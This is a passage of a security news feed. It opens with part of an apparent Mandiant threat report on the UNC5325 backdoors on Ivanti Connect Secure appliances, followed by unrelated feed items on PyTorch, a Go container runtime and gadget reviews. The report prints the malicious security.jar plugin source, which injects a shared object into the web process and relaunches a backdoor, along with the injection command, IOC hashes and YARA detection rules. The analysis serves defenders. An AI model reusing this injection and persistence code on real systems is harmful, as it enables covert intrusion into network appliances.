<div class="block-paragraph_advanced"><p>When <code>dsconfigreset</code> executes <code>/bin/tar -cf $tmp_part no-data</code>, the trojanized <code>tar</code> copies the contents of <code>/bin/samba_upgrade.tar</code> containing its malicious components to <code>/tmp/samba_upgrade.tar</code> in the factory reset root partition (mounted on <code>/tmp/tmpmnt</code>).</p>
<p>Next, similar to the previously described system upgrade persistence flow, the appliance executes the <code>post-install</code> bash script during the installation process of the new system. This script decompresses the <code>samba_upgrade.tar</code> archive in the factory reset partition, copying the malicious components (<code>libchilkat.so</code>, <code>plugin.jar</code>, and <code>gateway.conf</code>) to the new active partition created after the factory reset.</p>
<h5>Hooking the Web Server Process</h5>
<p>The <code>httpd_monitor()</code> function ensures the persistent injection of another shared object, <code>libaprhelper.so</code> (PITSOCK), into the <code>web</code> process using a built-in injection function named <code>inject_loop()</code>. </p>
<p>PITSOCK hooks the functions <code>accept</code> and <code>setsockopt</code> of the <code>web</code> process by modifying its procedure linkage table (PLT). This enables backdoor communication via the Unix socket <code>/tmp/clientsDownload.sock</code> when it receives a specific 48-byte magic byte sequence in the incoming buffer.</p>
<h5>Creating the Malicious SparkGateway Plugin</h5>
<p>Lastly, <code>libchilkat.so</code> calls <code>persist()</code>, which modifies the SparkGateway configuration file. Figure 18 shows an excerpt from the modified SparkGateway configuration file to support and load the plugin.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>plugin = com.toremote.gateway.plugin.PluginManager
pluginFile = /home/runtime/SparkGateway/plugin.jar</code></pre>
<p><span><em><span>Figure 18: Excerpt of SparkGateway configuration file</span></em></span></p></div>
<div class="block-paragraph_advanced"><h5>Backdoor Features</h5>
<p><code>libchilkat.so</code> also serves as a stand-alone backdoor that supports expected features such as command execution, file management, shell creation, SOCKS proxy, and network traffic tunneling. It communicates over SSL using the private key located on the Ivanti Connect Secure web server (<code>/home/webserver/conf/ssl.key/secure.key</code>) and communicates using the socket <code>/tmp/clientsDownload.sock</code>.</p>
<h4>PITDOG Plugin</h4>
<p>Mandiant identified a second malicious SparkGateway plugin named <code>security.jar</code> (PITDOG) that uses <a href="https://github.com/kubo/injector" rel="noopener" target="_blank"><u>Kubo Injector</u></a> (<code>memorysCounter</code>) to inject a shared object, <code>mem.rd</code> (PITHOOK), into the <code>web</code> process memory, and persistently executes a backdoor, <code>dsAgent</code> (PITSTOP). Figure 19 shows the relevant excerpts from <code>security.jar</code>.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>public class SparkPlugin implements ManagerInterface {
  public static void watchdog() {
    try {
      Thread.sleep(300000L);
      ProcessBuilder processBuilder = new ProcessBuilder(new String[0]);
      Process process = Runtime.getRuntime().exec(new String[] { "/bin/sh", 
"-c", "ps aux|grep '/home/bin/web'|grep -v grep | 
awk '{if (NR!=1) {print $2}}'" });
      BufferedReader reader = new BufferedReader(new InputStreamReader
(process.getInputStream()));
      String line;
      while ((line = reader.readLine()) != null) {
        int procnum = Integer.parseInt(line);
        String catprocstr = String.format("cat /proc/%d/maps | grep mem.rd", 
new Object[] { Integer.valueOf(procnum) });
        Process processinjectres = Runtime.getRuntime().exec(new String[] 
{ "/bin/sh", "-c", catprocstr });
        BufferedReader processinjectreader = new BufferedReader(new 
InputStreamReader(processinjectres.getInputStream()));
        if ((line = processinjectreader.readLine()) == null) {
          String processinjectstr = String.format("/data/runtime/cockpit
/memorysCounter -p %d /data/runtime/cockpit/mem.rd", new Object[] 
{ Integer.valueOf(procnum) });
          Process process1 = Runtime.getRuntime().exec(new String[] 
{ "/bin/sh", "-c", processinjectstr });
        } 
      } 
      Process processps = Runtime.getRuntime().exec(new String[] 
{ "/bin/sh", "-c", "ps aux|grep '/data/runtime/cockpit/dsAgent'|grep 
-v grep | awk '{print $2}'" });
      BufferedReader readerps = new BufferedReader(new 
InputStreamReader(processps.getInputStream()));
      if ((line = readerps.readLine()) == null) {
        Process processinjectres = Runtime.getRuntime().exec("rm 
-f /data/runtime/cockpit/wd.lock");
        ProcessBuilder processBuilder1 = (new ProcessBuilder(new 
String[] { "/data/runtime/cockpit/dsAgent" })).redirectErrorStream(true);
        Process process1 = processBuilder1.start();
      } 
    } catch (Exception exception) {}
  }
  
  public HandshakeInterface getHandshakePlugin() {
    long timeInterval = 10000L;
    Runnable runnable = new Runnable() {
        public void run() {
          while (true) {
            SparkPlugin.watchdog();
            try {
              Thread.sleep(10000L);
            } catch (InterruptedException e) {
              e.printStackTrace();
            } 
          } 
        }
      };
    Thread thread = new Thread(runnable);
    thread.start();
    return null;
  }</code></pre>
<p><span><em><span>Figure 19: Excerpt of security.jar plugin</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>The SparkGateway configuration is modified to load the plugin. Figure 20 shows the relevant excerpt from <code>gateway.conf</code>.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>plugin = SparkPlugin
pluginFile = /data/runtime/cockpit/security.jar</code></pre>
<p><span><em><span>Figure 20: Excerpt of SparkGateway configuration file</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>The <code>security.jar</code> plugin is executed during the negotiation of an RDP connection when the system invokes the Handshake plugin. The <code>getHandshakePlugin()</code> method creates a new thread from a Runnable interface that repeatedly calls <code>SparkPlugin.watchdog()</code> every ten (10) seconds. This acts as a persistence method to ensure the continuous execution of the malicious <code>watchdog</code> method without interfering with the primary operation of the SparkGateway application.</p>
<p>The <code>watchdog</code> method first checks if the shared object <code>mem.rd</code> (PITHOOK) is mapped within the <code>web</code> process memory. If not, it injects <code>mem.rd</code> into the <code>web</code> process.</p>
<p>Figure 21 shows the command executed to inject PITHOOK (<code>mem.rd</code>) into the web process, where <code>%d</code> represents the process ID (PID) of the <code>web</code> process.</p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>/data/runtime/cockpit/memorysCounter -p %d /data/runtime/cockpit/mem.rd</code></pre>
<p><span><em><span>Figure 21: Command to inject PITHOOK</span></em></span></p></div>
<div class="block-paragraph_advanced"><p>We determined that <code>/data/runtime/cockpit/memorysCounter</code> is a direct instance of <a href="https://github.com/kubo/injector" rel="noopener" target="_blank"><u>Kubo Injector</u></a> without any additional modifications or changes. Kubo Injector is based on the popular <a href="https://github.com/gaffe23/linux-inject" rel="noopener" target="_blank"><u>linux-inject</u></a> project, a utility that can inject a shared object into an arbitrary process given a process name or process ID.</p>
<p><span>PITHOOK hooks the </span><code>accept</code><span> and </span><code>accept4</code><span> functions within the </span><code>web</code><span> process by modifying the PLT. When PITHOOK receives a buffer matching the predefined magic byte sequence, it will duplicate the socket and forward </span><span>it to PITSTOP over the</span><span> Unix domain socket </span><code>/data/runtime/cockpit/wd.fd</code><span>.</span></p>
<p>Lastly, the <code>watchdog</code> method will execute the PITSTOP backdoor (<code>/data/runtime/cockpit/dsAgent</code>) if it is not already running.</p>
<p>PITSTOP creates and listens on the Unix domain socket located at <code>/data/runtime/cockpit/wd.fd</code>. It waits to receive a socket forwarded by PITHOOK after receiving the predefined magic byte sequence. Then PITSTOP duplicates the socket for further communication over TLS. When the TLS connection is established, PITSTOP uses Base64 and a hard-coded AES key to evaluate the incoming command. It supports shell command execution, file write, and file read on the compromised appliance.</p>
<h2>Outlook and Implications</h2>
<p>UNC5325’s TTPs and malware deployment showcase the capabilities that <a href="https://cloud.google.com/blog/topics/threat-intelligence/chinese-espionage-tactics" rel="noopener" target="_blank"><u>suspected China-nexus espionage actors</u></a> have continued to leverage against edge infrastructure in conjunction with zero days. Similar to <a href="https://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation" rel="noopener" target="_blank"><u>UNC4841</u></a>’s familiarity with Barracuda ESGs, UNC5325 demonstrates significant knowledge of the Ivanti Connect Secure appliance as seen in both the malware they used and the attempts to persist across factory resets. Mandiant expects UNC5325 as well as other China-nexus espionage actors to continue to leverage zero day vulnerabilities on network edge devices as well as <a href="https://cloud.google.com/blog/topics/threat-intelligence/fortinet-malware-ecosystem" rel="noopener" target="_blank"><u>appliance-specific malware </u></a>to gain and maintain access to target environments.</p>
<h6><em>The material in this blog post is being shared as cyber threat indicators and defensive measures solely for cybersecurity purposes in accordance with the Cybersecurity Information Sharing Act of 2015 (“CISA/2015”).  This information is subject to the provisions of CISA/2015, including 6 U.S. Code § 1504(d)(1).</em></h6></div>
<div class="block-paragraph_advanced"><h2><span>Indicators of Compromise (IOCs)</span></h2>
<h3><span>Host-Based Indicators (HBIs)</span></h3>
<div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table border="1px" cellpadding="16px"><colgroup><col><col><col></colgroup>
<thead>
<tr>
<th scope="col">
<p><strong>Filename</strong></p>
</th>
<th scope="col">
<p><strong>MD5</strong></p>
</th>
<th scope="col">
<p><strong>Description</strong></p>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<p><code>DSUserAgentCap.pm</code></p>
</td>
<td>
<p><span>e4fe3a314a3aee5aee9c55787a33671c</span></p>
</td>
<td>
<p><span>BUSHWALK activator / deactivator</span></p>
</td>
</tr>
<tr>
<td>
<p><code>querymanifest.cgi</code></p>
</td>
<td>
<p><span>e48716521dc48425feae71bc9dc768cd</span></p>
</td>
<td>
<p><span>BUSHWALK variant</span></p>
</td>
</tr>
<tr>
<td>
<p><code>diskCounters</code></p>
</td>
<td>
<p><span>8c4b32e8ee9e0b2f8dab01364971ffff</span></p>
</td>
<td>
<p><span>Dropper for DSUserAgentCap.pm</span></p>
</td>
</tr>
<tr>
<td>
<p><code>diskmonitor</code></p>
</td>
<td>
<p><span>e33a3a90f1f8fa6d8f17bc6151b027d6</span></p>
</td>
<td>
<p><span>Encrypted DSUserAgentCap.pm</span></p>
</td>
</tr>
<tr>
<td>
<p><code>diskAnalysis</code></p>
</td>
<td>
<p><span>6c58b8b1e3b36a5a124afd110c109ebc</span></p>
</td>
<td>
<p><span>Encrypted BUSHWALK variant</span></p>
</td>
</tr>
<tr>
<td>
<p><code>plugin.jar</code></p>
</td>
<td>
<p><span>b76d7890a7a7ff6d0b1151a8251e318f</span></p>
</td>
<td>
<p><span>PITFUEL SparkGateway plugin</span></p>
</td>
</tr>
<tr>
<td>
<p><code>gateway.conf</code></p>
</td>
<td>
<p><span>9e0941c4851d414b5d25dd15872c3e47</span></p>
</td>
<td>
<p><span>SparkGateway config to load PITFUEL</span></p>
</td>
</tr>
<tr>
<td>
<p><code>libchilkat.so</code></p>
</td>
<td>
<p><span>fd83b3e9db57838b62c5baf8218ce5a8</span></p>
</td>
<td>
<p><span>LITTLELAMB.WOOLTEA backdoor</span></p>
</td>
</tr>
<tr>
<td>
<p><code>libaprhelper.so</code></p>
</td>
<td>
<p><span>2ddeca6511506fe435dc1f63b4cf061c</span></p>
</td>
<td>
<p><span>PITSOCK backdoor</span></p>
</td>
</tr>
<tr>
<td>
<p><code>security.jar</code></p>
</td>
<td>
<p><span>f64a799ff16aded3f4d6706ffbd7e6dd</span></p>
</td>
<td>
<p><span>PITDOG SparkGateway plugin</span></p>
</td>
</tr>
<tr>
<td>
<p><code>gateway.conf</code></p>
</td>
<td>
<p><span>fb973c8bbfdba234ea83ee20084dcac9</span></p>
</td>
<td>
<p><span>SparkGateway config to load PITDOG</span></p>
</td>
</tr>
<tr>
<td>
<p><code>mem.rd</code></p>
</td>
<td>
<p><span>5368b1122c10fa7850f44d3e16fc18fb</span></p>
</td>
<td>
<p><span>PITHOOK backdoor</span></p>
</td>
</tr>
<tr>
<td>
<p><code>memorysCounter</code></p>
</td>
<td>
<p><span>31a591a28198f05e9ab4d12609a9ce81</span></p>
</td>
<td>
<p><span>Kubo Injector</span></p>
</td>
</tr>
<tr>
<td>
<p><code>dsAgent</code></p>
</td>
<td>
<p><span>5f561f217a8046de8cadf418ef4dfda0</span></p>
</td>
<td>
<p><span>PITSTOP backdoor</span></p>
</td>
</tr>
<tr>
<td>
<p><code>wd.fd</code></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>Unix domain socket for PITSTOP</span></p>
</td>
</tr>
<tr>
<td>
<p><code>wd.lock</code></p>
</td>
<td>
<p><span>N/A</span></p>
</td>
<td>
<p><span>Mutex for PITSTOP</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<p><span><em><span>Table 3: Host-based indicators</span></em></span></p>
<h2><span>YARA Rules</span></h2>
</div></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Launcher_PITDOG_1 {
  meta:
    author = "Mandiant"
    description = "This rule is designed to detect on events 
related to PITDOG."
	strings:
		$str2 = "cat /proc/%d/maps | grep mem.rd"
		$str3 = "/data/runtime/cockpit/memorysCounter 
-p %d /data/runtime/cockpit/mem.rd"
		$str4 = "rm -f /data/runtime/cockpit/wd.lock"
		$str5 = "/data/runtime/cockpit/dsAgent"
		$str6 = "watchdog"
		$str7 = "ps aux|grep '/home/bin/web'|grep -v grep 
| awk '{if (NR!=1) {print $2}}'"
condition:
	uint32(0) == 0xBEBAFECA and all of them
}
</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Utility_PITHOOK_1 {
  meta:
    author = " Mandiant"
    description = "This rule is designed to detect on events 
related to PITHOOK."
	strings:
		$str1 = "/data/runtime/cockpit/wd.fd"
		$str2 = "/proc/self/maps"
		$str3 = "plthook_open"
		$str4 = "plthook_replace"
		$str5 = "plthook_close"
		$str6 = "plthook_open_by_handle"
		$str7 = "plthook_open_by_address"
		$str8 = "plthook_enum"
		$str9 = "plthook_error"
		$str10 = "accept4_hook"
	condition:
		uint32(0) == 0x464C457F and all of them
}
</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Hunting_Webshell_BUSHWALK_1 {
  meta:
    author = "Mandiant"
    description = "This rule detects BUSHWALK, a webshell 
written in Perl CGI that is embedded into a legitimate 
Pulse Secure file to enable file transfers"
  strings:
    $s1 = "SafariiOS" ascii
    $s2 = "command" ascii
    $s3 = "change" ascii
    $s4 = "update" ascii
    $s5 = "$data = RC4($key, $data);" ascii
  condition:
    filesize &lt; 5KB
    and all of them
}
</code></pre></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>rule M_Hunting_Launcher_PITFUEL_1 {
    meta:
		author = "Mandiant"
		description = "This rule detects class used in 
PITFUEL, a malicious JAR-based launcher that loads malicious code"
	strings:
		$h1 = {50 4B 03 04}
		$s1 = "com/toremote/gateway/plugin/PluginManager.class"
	condition:
		$h1 at 0 and for any i in (0..#h1): ($s1 in (@h1[i]..@h1[i]+80))
}
</code></pre></div>
<div class="block-paragraph_advanced"><h2>Mandiant Security Validation Actions</h2>
<p>Organizations can validate their security controls using the following actions with <a href="https://cloud.google.com/security/products/threat-intelligence" rel="noopener" target="_blank"><u>Mandiant Security Validation</u></a>.<br><br></p>
<div align="center">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>VID</strong></p>
</td>
<td>
<p><strong>Name</strong></p>
</td>
</tr>
<tr>
<td>
<p><span>A106-935</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2023-46805, Authentication Bypass, Variant #1</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A106-934</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2024-21887, Command Injection, Variant #1</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A106-936</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2024-21887, Command Injection, Variant #2</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A106-986</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2024-21893, Exploitation, Variant #1</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A107-055</span></p>
</td>
<td>
<p><span>Application Vulnerability - CVE-2024-22024, Exploitation, Variant #1</span></p>
</td>
</tr>
<tr>
<td>
<p><span>A107-060</span></p>
</td>
<td>
<p><span>Malicious File Transfer - BUSHWALK, Download, Variant #1</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[trunk/fa5cb72912c44b22acd9c26c69f3e933794ac501: Revert "Fix symbolic magic method lowerings (#184327)"]]></title>
<description><![CDATA[This reverts commit fbecdb3.
Reverted #184327 on behalf of https://github.com/facebook-github-tools due to Diff reverted internally (comment)]]></description>
<link>https://tsecurity.de/de/3578792/downloads/trunkfa5cb72912c44b22acd9c26c69f3e933794ac501-revert-fix-symbolic-magic-method-lowerings-184327/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578792/downloads/trunkfa5cb72912c44b22acd9c26c69f3e933794ac501-revert-fix-symbolic-magic-method-lowerings-184327/</guid>
<pubDate>Sun, 07 Jun 2026 06:31:46 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This reverts commit <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/pytorch/pytorch/commit/fbecdb31353a6b8df76020c9553bab9701a574c9/hovercard" href="https://github.com/pytorch/pytorch/commit/fbecdb31353a6b8df76020c9553bab9701a574c9"><tt>fbecdb3</tt></a>.</p>
<p>Reverted <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4475303407" data-permission-text="Title is private" data-url="https://github.com/pytorch/pytorch/issues/184327" data-hovercard-type="pull_request" data-hovercard-url="/pytorch/pytorch/pull/184327/hovercard" href="https://github.com/pytorch/pytorch/pull/184327">#184327</a> on behalf of <a href="https://github.com/facebook-github-tools">https://github.com/facebook-github-tools</a> due to Diff reverted internally (<a href="https://github.com/pytorch/pytorch/pull/184327#issuecomment-4641382067" data-hovercard-type="pull_request" data-hovercard-url="/pytorch/pytorch/pull/184327/hovercard">comment</a>)</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Crate - a daemonless container runtime I built in Go to learn how Docker works]]></title>
<description><![CDATA[Hey folks, I’ve been working on Crate for the past few weeks. It’s a small daemonless container runtime written in Go for Linux. The goal was to understand how container runtimes work under the hood instead of treating Docker/Podman as magic. It launches containers directly, stores state on disk,...]]></description>
<link>https://tsecurity.de/de/3578662/linux-tipps/crate-a-daemonless-container-runtime-i-built-in-go-to-learn-how-docker-works/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3578662/linux-tipps/crate-a-daemonless-container-runtime-i-built-in-go-to-learn-how-docker-works/</guid>
<pubDate>Sun, 07 Jun 2026 03:53:46 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hey folks,</p> <p>I’ve been working on <strong>Crate</strong> for the past few weeks. It’s a small daemonless container runtime written in Go for Linux.</p> <p>The goal was to understand how container runtimes work under the hood instead of treating Docker/Podman as magic. It launches containers directly, stores state on disk, and supports both rootless and rootful execution.</p> <p>Currently, it supports the core pieces of a basic container runtime:</p> <ul> <li>pulling and running Docker Hub images</li> <li>container lifecycle commands like <code>run</code>, <code>create</code>, <code>start</code>, <code>stop</code>, <code>ps</code>, <code>logs</code>, and <code>rm</code></li> <li>Linux namespaces for process, mount, hostname, user, and network isolation</li> <li>root filesystem setup with <code>pivot_root</code> / <code>chroot</code></li> <li>bind mounts, image env/CMD/entrypoint handling, and interactive PTYs</li> <li>rootless private networking with <code>pasta</code> and port publishing (doesn't support networking in root gonna add that soon)</li> </ul> <p>I’ve also written a small guide/docs series for anyone else who wants to understand or build something similar: <a href="https://github.com/aayushkdev/crate/tree/main/docs">docs</a></p> <p>It’s still experimental and not production-ready. Big missing pieces include cgroups/resource limits, stronger security hardening, full OCI compliance, better registry support, multi-platform support and probably a million other things that Im forgetting.</p> <p>Repo: <a href="https://github.com/aayushkdev/crate/">https://github.com/aayushkdev/crate/</a></p> <p>I’m still improving it, so I’d love to hear feedback, ideas, or suggestions. If you like the project, a star on GitHub would mean a lot.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/not_a_bot6"> /u/not_a_bot6 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1tyk9r0/crate_a_daemonless_container_runtime_i_built_in/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1tyk9r0/crate_a_daemonless_container_runtime_i_built_in/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hasbro is turning Optimus Prime and Mr. Potato Head into AI-powered voices — which is one sure-fire way to ruin our childhood memories]]></title>
<description><![CDATA[Hasbro's new AI character initiative may be a smart licensing strategy, but transforming iconic childhood figures into endlessly available conversational AI could weaken the very magic that made them beloved in the first place.]]></description>
<link>https://tsecurity.de/de/3577049/it-nachrichten/hasbro-is-turning-optimus-prime-and-mr-potato-head-into-ai-powered-voices-which-is-one-sure-fire-way-to-ruin-our-childhood-memories/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3577049/it-nachrichten/hasbro-is-turning-optimus-prime-and-mr-potato-head-into-ai-powered-voices-which-is-one-sure-fire-way-to-ruin-our-childhood-memories/</guid>
<pubDate>Sat, 06 Jun 2026 06:17:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Hasbro's new AI character initiative may be a smart licensing strategy, but transforming iconic childhood figures into endlessly available conversational AI could weaken the very magic that made them beloved in the first place.]]></content:encoded>
</item>
<item>
<title><![CDATA[Mark Rosewater's infectious love of Marvel has changed my mind on Magic: The Gathering's next Universes Beyond set]]></title>
<description><![CDATA[Mark Rosewater has made me excited for Magic's next Universes Beyond set.]]></description>
<link>https://tsecurity.de/de/3576577/it-nachrichten/mark-rosewaters-infectious-love-of-marvel-has-changed-my-mind-on-magic-the-gatherings-next-universes-beyond-set/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576577/it-nachrichten/mark-rosewaters-infectious-love-of-marvel-has-changed-my-mind-on-magic-the-gatherings-next-universes-beyond-set/</guid>
<pubDate>Fri, 05 Jun 2026 23:02:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mark Rosewater has made me excited for Magic's next Universes Beyond set.]]></content:encoded>
</item>
<item>
<title><![CDATA[Sally: Ultrafast Lasers 101: A Photonic Adventure for Molecular Dynamics Enthusiasts]]></title>
<description><![CDATA[Author: media.ccc.de - Bewertung: 1x - Views:20 https://media.ccc.de/v/gpn24-476-ultrafast-lasers-101-a-photonic-adventure-for-molecular-dynamics-enthusiasts

I'll cover the fundamentals of laser operation, including gain, population inversion and how you convince a bunch of excited atoms to all ...]]></description>
<link>https://tsecurity.de/de/3576234/it-security-video/sally-ultrafast-lasers-101-a-photonic-adventure-for-molecular-dynamics-enthusiasts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576234/it-security-video/sally-ultrafast-lasers-101-a-photonic-adventure-for-molecular-dynamics-enthusiasts/</guid>
<pubDate>Fri, 05 Jun 2026 19:48:54 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: media.ccc.de - Bewertung: 1x - Views:20 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/duGnYcSw1vA?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>https://media.ccc.de/v/gpn24-476-ultrafast-lasers-101-a-photonic-adventure-for-molecular-dynamics-enthusiasts<br />
<br />
I'll cover the fundamentals of laser operation, including gain, population inversion and how you convince a bunch of excited atoms to all emit light in sync instead of doing their own thing.<br />
We then explore how femtosecond pulses are produced in practice.<br />
I'll explain some simple methods for shaping, tweaking, and measuring those pulses.<br />
As a practical example, I will walk you through the velocity map imaging (VMI) setup I work with to show what can be done with this equipment, watching molecules fall apart, like a molecular stroboscope.<br />
<br />
I work in a research group¹ doing "Ultrafast Dynamics inside He Nanodroplets".<br />
I'd like to share some of the fascinating concepts, from my perspective doing real time data analysis for the research group.<br />
„In order to measure an event in time, you must use a shorter one...“ ~ Rick Trebino<br />
This is why we are interested in pulses of that regime, molecular dynamics operate exactly at that timescale.<br />
But when one works with such short pulses, not only aligning the setup becomes a real pain, but also non-linear effects take over in ways you wouldn't expect from a classic optics viewpoint. Comparable to RF magic in electronics, you wouldn't expect when you look at low frequencies.<br />
The goal is to develop an intuitive understanding of how the knowledge fits together and what those techniques enable us to observe.<br />
I will not go deep into the details, because this topic is extremely complex and even the master's course at my university about "Ultrafast laser physics" is an overview of the topic. So this is going to be "an overview of an overview", a 101.<br />
<br />
[1] Femtosecond Dynamics, TU Graz ( https://www.tugraz.at/en/institutes/iep/research/femtosecond-dynamics )<br />
<br />
Sally<br />
<br />
https://cfp.gulas.ch/gpn24/talk/JL7QUB/<br />
<br />
#gpn24 #Science<br />
<br />
Licensed to the public under https://creativecommons.org/licenses/by/4.0/<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ultrafast Lasers 101: A Photonic Adventure for Molecular Dynamics Enthusiasts (gpn24)]]></title>
<description><![CDATA[I'll cover the fundamentals of laser operation, including gain, population inversion and how you convince a bunch of excited atoms to all emit light in sync instead of doing their own thing.
We then explore how femtosecond pulses are produced in practice.
I'll explain some simple methods for shap...]]></description>
<link>https://tsecurity.de/de/3576174/it-security-video/ultrafast-lasers-101-a-photonic-adventure-for-molecular-dynamics-enthusiasts-gpn24/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3576174/it-security-video/ultrafast-lasers-101-a-photonic-adventure-for-molecular-dynamics-enthusiasts-gpn24/</guid>
<pubDate>Fri, 05 Jun 2026 19:18:46 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[I'll cover the fundamentals of laser operation, including gain, population inversion and how you convince a bunch of excited atoms to all emit light in sync instead of doing their own thing.
We then explore how femtosecond pulses are produced in practice.
I'll explain some simple methods for shaping, tweaking, and measuring those pulses.
As a practical example, I will walk you through the velocity map imaging (VMI) setup I work with to show what can be done with this equipment, watching molecules fall apart, like a molecular stroboscope.

I work in a research group¹ doing &quot;Ultrafast Dynamics inside He Nanodroplets&quot;.
I'd like to share some of the fascinating concepts, from my perspective doing real time data analysis for the research group.
„In order to measure an event in time, you must use a shorter one...“ ~ Rick Trebino
This is why we are interested in pulses of that regime, molecular dynamics operate exactly at that timescale.
But when one works with such short pulses, not only aligning the setup becomes a real pain, but also non-linear effects take over in ways you wouldn't expect from a classic optics viewpoint. Comparable to RF magic in electronics, you wouldn't expect when you look at low frequencies.
The goal is to develop an intuitive understanding of how the knowledge fits together and what those techniques enable us to observe.
I will not go deep into the details, because this topic is extremely complex and even the master's course at my university about &quot;Ultrafast laser physics&quot; is an overview of the topic. So this is going to be &quot;an overview of an overview&quot;, a 101.

[1] Femtosecond Dynamics, TU Graz ( https://www.tugraz.at/en/institutes/iep/research/femtosecond-dynamics )

Licensed to the public under https://creativecommons.org/licenses/by/4.0/
about this event: https://cfp.gulas.ch/gpn24/talk/JL7QUB/]]></content:encoded>
</item>
<item>
<title><![CDATA[Brydge Max 13 review: Finally, a compelling Magic Keyboard alternative]]></title>
<description><![CDATA[Brydge Max 13 is an all-in-one keyboard, trackpad, and stand for iPad Pro that has the potential to outshine Apple's Magic Keyboard.Brydge Max 13 review:  The new all-aluminum iPad keyboardWith a price tag pushing $400 in the U.S., post-tax, it's no surprise that competitors have been relentlessl...]]></description>
<link>https://tsecurity.de/de/3575895/ios-mac-os/brydge-max-13-review-finally-a-compelling-magic-keyboard-alternative/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3575895/ios-mac-os/brydge-max-13-review-finally-a-compelling-magic-keyboard-alternative/</guid>
<pubDate>Fri, 05 Jun 2026 17:52:26 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Brydge Max 13 is an all-in-one keyboard, trackpad, and stand for iPad Pro that has the potential to outshine Apple's <a href="https://appleinsider.com/inside/magic-keyboard" title="Magic Keyboard" data-kpt="1">Magic Keyboard</a>.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67716-142911-Brydge-Max-13-on-Armrest-xl.jpg" alt="Tablet on a keyboard stand displaying a colorful rainbow home screen and widgets, placed indoors on a couch armrest with blurred household items in the background" height="738">Brydge Max 13 review:  The new all-aluminum iPad keyboard<br></div><br><br>With a price tag pushing $400 in the U.S., post-tax, it's no surprise that competitors have been relentlessly releasing lower-priced options to the Magic Keyboard. Most, though, swap out premium materials for cheaper ones, like plastic.<br><br>At times, it feels like a race to the bottom. Premium keyboards outside of Apple's have largely been few and far between.<br><br><br> <a href="https://appleinsider.com/articles/26/06/05/brydge-max-13-review-finally-a-compelling-magic-keyboard-alternative?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244545?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Devolo Magic 2 WiFi 6 Next im Test: Starkes WLAN aus der Steckdose]]></title>
<description><![CDATA[WLAN durch dicke Wände? Der Devolo Magic 2 WiFi 6 Next bringt Internet per Steckdose. COMPUTER BILD testet Tempo, Reichweite und Praxis.]]></description>
<link>https://tsecurity.de/de/3575721/it-nachrichten/devolo-magic-2-wifi-6-next-im-test-starkes-wlan-aus-der-steckdose/</link>
